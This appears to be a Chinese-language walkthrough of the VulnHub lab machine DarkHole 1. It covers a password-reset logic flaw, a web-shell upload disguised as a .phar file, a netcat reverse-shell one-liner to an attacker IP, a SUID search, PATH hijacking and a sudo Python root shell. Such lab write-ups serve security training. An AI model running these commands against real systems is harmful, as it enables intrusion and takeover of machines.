下载地址:https://download.vulnhub.com/darkhole/DarkHole.zip
攻击者IP:172.20.134.149 natvmare
受害者IP:172.20.134.142 nat wmare
参考:https://blog.csdn.net/MRS_jianai/article/details/128497960
https://blog.csdn.net/Perpetual_Blue/article/details/124265351
主机发现
端口扫描
目录扫描
http://172.20.134.142/login.php
注册一个账号后登录
登陆后的页面,可能存在sql或任意用户密码重置等逻辑漏洞
sql注入防护的很严实
重置一下id=1的密码,盲猜用户名是admin
admin/root
文件上传
参考:https://zh.wikipedia.org/wiki/PHAR_(%E6%96%87%E4%BB%B6%E6%A0%BC%E5%BC%8F)
https://websec.readthedocs.io/zh/latest/language/php/phar.html
https://www.php.net/manual/en/book.phar.php
phar(PHP Archive)文件是一种打包格式,将PHP代码文件和其他资源放入一个文件中来实现应用程序和库的分发。
在来自Secarma的安全研究员Sam Thomas在18年的Black Hat上提出后利用方式后,开始受到广泛的关注。
Phar可利用是因为Phar以序列化的形式存储用户自定义的meta-data,而以流的形式打开的时候,会自动反序列化,从而触发对应的攻击载荷。
或者使用phtml
PHTML文件扩展名通常与PHP脚本相关联,它允许在HTML文件中嵌入PHP代码。
https://stackoverflow.com/questions/11859015/what-is-phtml-and-when-should-i-use-a-phtml-extension-rather-than-php
将php改成phar上传
蚁剑反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 172.20.134.129 1111 >/tmp/f
反弹成功
查找suid权限
find / -user root -perm -4000 -print 2>/dev/null
发现
/home/john/toto
执行后是john用户执行了id命令
命令劫持
cd /tmp# 切换到/tmp 目录echo "/bin/bash" > id# 将命令写入文件 id 中chmod +x id# 修改文件权限,增加执行权限export PATH=/tmp:$PATH # 添加/tmp 目录到 PATH 变量中which id# 查看 id 命令的路径
执行toto
方法1
发现用户darkhole的密码,直接修改root密码,切换root
方法2:
root123同时也是john的密码
sudo -l
发现john可以以root的身份执行file这个python文件:
在file.py里面写一段打开shell的代码,再以root的身份执行
echo "import pty;pty.spawn('/bin/bash')" > file.pysudo python3 /home/john/file.py
原文始发于微信公众号(王之暴龙战神):DarkHole1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论